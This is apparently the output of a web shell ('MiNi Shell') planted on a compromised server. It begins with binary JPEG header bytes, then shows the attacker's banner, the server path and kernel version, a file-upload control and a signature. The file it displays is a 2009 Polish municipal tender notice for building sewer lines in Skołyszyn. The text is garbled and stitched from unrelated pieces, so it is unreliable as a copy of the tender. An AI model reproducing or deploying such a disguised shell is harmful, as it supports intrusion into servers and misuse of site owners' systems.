JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090406/93682-N-2009.html

<p class="kh_header"><b>Skołyszyn: Budowa odcinków sieci sanitarnej grawitacyjnej w Gminie Skołyszyn, w miejscowościach: 1) Kunowa, Harklowa, Pusta Wola, Przysieki (przysiółek Przysieczki);  2) Przysieki, Skołyszyn (przysiółek Lisówek).</b><br>
<b>Numer ogłoszenia: 93682 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Skołyszynie , 12, 38-242 Skołyszyn, woj. podkarpackie, tel. 013 449-10-62 do 64 w. 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.skolyszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa odcinków sieci sanitarnej grawitacyjnej w Gminie Skołyszyn, w miejscowościach: 1) Kunowa, Harklowa, Pusta Wola, Przysieki (przysiółek Przysieczki);  2) Przysieki, Skołyszyn (przysiółek Lisówek)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach niniejszego postępowania przetargowego należy wykonać:
1)  Roboty ziemne (Wykopy i zasypanie)
2) Wykonanie 4 118 mb odcinków kanalizacji sanitarnej z rur litych PVC kl. N oraz S, łączonej metodą na wcisk średnicy 160 mm oraz 43 mb średnicy 200 mm, montaż 209 szt. studzienek rewizyjnych systemowych z tworzyw sztucznych dn 400 mm, wykonanie 589 szt. przepięć instalacji kanalizacyjnej  z budynków do sieci,  w tym w miejscowościach:
a) zadanie Nr 1:  Kunowa, Harklowa, Pusta Wola, Przysieki (przysiółek Przysieczki):
 -  2 403 mb kanalizacji fi 160 mm;
 - montaż 54 szt. studzienek rewizyjnych;
 -   312 szt. przepięć budynków do sieci;
b) zadanie Nr 2: Przysieki, Skołyszyn (przysiółek Lisówek):
- 1 715  mb kanalizacji fi 160 mm oraz 43 mb fi 200 mm;
 - montaż 155 szt. studzienek rewizyjnych;
 	-   277 szt. przepięć budynków do sieci;
3/ Doprowadzenie terenu do stanu pierwotnego.
4/ Wykonanie geodezyjnej inwentaryzacji powykonawczej.
5/ Zakres robót nie obejmuje opróżniania i likwidacji zbiorników ścieków (szamb)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.10.00-5, 45.11.10.00-8, 45.23.20.00-2, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:  
1.  Posiadają niezbędne uprawnienia do wykonywania   określonej działalności lub czynności,   jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień.
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania  w/w zadania,  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w tym: 
1)  Wykonali w okresie ostatnich pięciu lat przed wszczęciem postępowania jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie  roboty związane z wykonaniem kanalizacji sanitarnej o wartości nie mniejszej niż   1 000 000 PLN  każda;
2)  Posiadają przeciętne zatrudnienie w okresie ostatnich trzech lat: 2007, 2008, 2009, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w ilości co najmniej 50 pracowników;
3/  Dysponują lub będą dysponować odpowiednimi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia, w tym co najmniej:  
- samochód dostawczy - 2 szt.
- samochód samowyładowczy pow. 5 t. -  2 szt.
- samochód skrzyniowy - 2 szt.
- przyczepa skrzyniowa 4.5 t - 2 szt.
- ciągnik kołowy - 2 szt.
- żuraw samochodowy 7-10,0 t - 1 szt.
- mini koparka o masie do 8 t - 8 szt.
- spycharka gąsienicowa pow. 10 t - 1 szt.
- koparka lub koparko ładowarka - kołowa - 2 szt.
4)   Dysponują lub będą dysponować odpowiednio wykwalifikowanym personelem niezbędnym do wykonania zamówienia tj. wskażą min. dwóch Kierowników budowy z uprawnieniami budowlanymi  w specjalności instalacyjnej, instalacyjno-inżynieryjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń kanalizacyjnych.
3.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym: 
1)  Osiągnęli w każdym roku obrotowym z ostatnich trzech lat, przed wszczęciem postępowania a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, roczne przychody netto ze sprzedaży w wysokości, co najmniej 1 000 000  PLN;
2)   Posiadają środki finansowe w wysokości co najmniej 1 000 000 PLN lub posiadają zdolność kredytową w wysokości 1 000 000 PLN;
3)   Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1 000 000 PLN.
4.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).
Sposób dokonania oceny spełnienia wymaganych warunków:
1) przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
2) niespełnienie chociażby jednego warunku (z uwzględnieniem zapisów art. 26 ust. 3 ustawy PZP) skutkować będzie wykluczeniem Wykonawcy z postępowania; ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
Zamawiający nie dopuszcza możliwości zlecania przedmiotu zamówienia podwykonawcom..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 PZP oraz że nie podlega wykluczeniu na podstawie art. 24 ust. 1 PZP. Wzór oświadczenia zawarty jest na formularzu ofertowym jako zał. Nr 4 do SIWZ (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
2. Zamawiający żąda w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 PZP - następujących dokumentów(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich): 
	1) aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich)
3.   Zamawiający żąda, w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę   i    doświadczenie, a także dysponuje potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia, następujących dokumentów (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniany będzie ich łączny  potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
1) wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (od dnia 06.04.2004 r. do 05.04.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - referencji (aby spełnić warunek Wykonawca musi wykazać wykonanie co najmniej dwóch robót związanych z wykonaniem kanalizacji sanitarnej nie mniejszej niż  1 000 000 PLN każda)  - zgodnie z wzorem jako zał. nr 5 do SIWZ;
2)  informacji dotyczącej przeciętnego zatrudnienia w okresie ostatnich trzech lat:  2007, 2008, 2009), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w ilości co najmniej 50 pracowników - zgodnie z wzorem jako zał. Nr 6 do SIWZ - (Zamawiający zastrzega sobie możliwość żądania dodatkowych dokumentów potwierdzających spełnianie w/w warunku);
3)  wykazu personelu, którym dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności -  Wykonawca musi wykazać, że dysponuje min. dwoma Kierownikami budowy z uprawnieniami budowlanymi w specjalności instalacyjnej, instalacyjno-inżynieryjnej bez ograniczeń, w zakresie sieci, instalacji i urządzeń kanalizacyjnych - do wykazu należy dołączyć: uprawnienia osoby w wymaganym zakresie zgodne z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane oraz aktualnie obowiązującym rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie -  oraz  zaświadczenie z właściwej OIIB stwierdzające przynależność do izby i aktualnie opłacane składki  - zgodnie z wzorem jako zał. nr 4 do SIWZ; 
3a)  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 3, Wykonawca wskazał osoby, którymi będzie dysponował;
4)   wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca, w tym co najmniej:                                    
- samochód dostawczy - 2 szt.
- samochód samowyładowczy pow. 5 t. -  2 szt.
- samochód skrzyniowy - 2 szt.
- przyczepa skrzyniowa 4.5 t - 2 szt.
- ciągnik kołowy - 2 szt.
- żuraw samochodowy 7-10,0 t - 1 szt.
- mini koparka o masie do 8 t - 8 szt.
- spycharka gąsienicowa o masie pow. 10 t.
- koparka, koparko-ładowarka kołowa 0.25 m3 - 2 szt.
- zgodnie z wzorem jako zał. nr 4 do SIWZ - należy podać markę, typ sprzętu;
4a)  pisemnego zobowiązania innych podmiotów do udostępniania niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w ppkt 4, Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
4.  Zamawiający żąda, w celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, następujących dokumentów  (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniany będzie ich łączna sytuacja finansowa):
1) rachunku zysków i strat za okres ostatnich trzech lat obrotowych (2006,2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego - innych dokumentów - określających roczne przychody netto ze sprzedaży na kwotę co najmniej 1 000 000 PLN;
2) informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych w kwocie co najmniej 1 000 000 PLN lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż trzy miesiące przed upływem terminu składania ofert (z informacji banku potwierdzającej posiadanie zdolności kredytowej musi jasno wynikać, że Wykonawca taką zdolność posiada bez spełniania jakichkolwiek dodatkowych warunków); 
3)  polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 1 000 000 PLN;
5.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  Polskiej, zamiast dokumentów na potwierdzenie uprawnienia do wykonania określonej działalności Wykonawca postępuje zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z 19 maja 2006 r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form,              w  jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605, zm. 16.10.2008r. Dz.U. Nr 188, poz. 1155).
6.  Zamawiający wymaga, aby żądane przez niego dokumenty zostały złożone w formie oryginału lub  kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.skolyszyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Skołyszynie 38-242 Skołyszyn 12, pok. nr 23, tel. 013 4491062-64 wewn. 51 lub 4491751..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 08:30, miejsce: Oferty należy składać w Urzędzie Gminy w Skołyszynie - pok. Nr 8 UG Skołyszyn(sekretariat) w godzinach pracy tj. 7:30 do 15:30 oprócz sobót i dni ustawowo wolnych od pracy..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com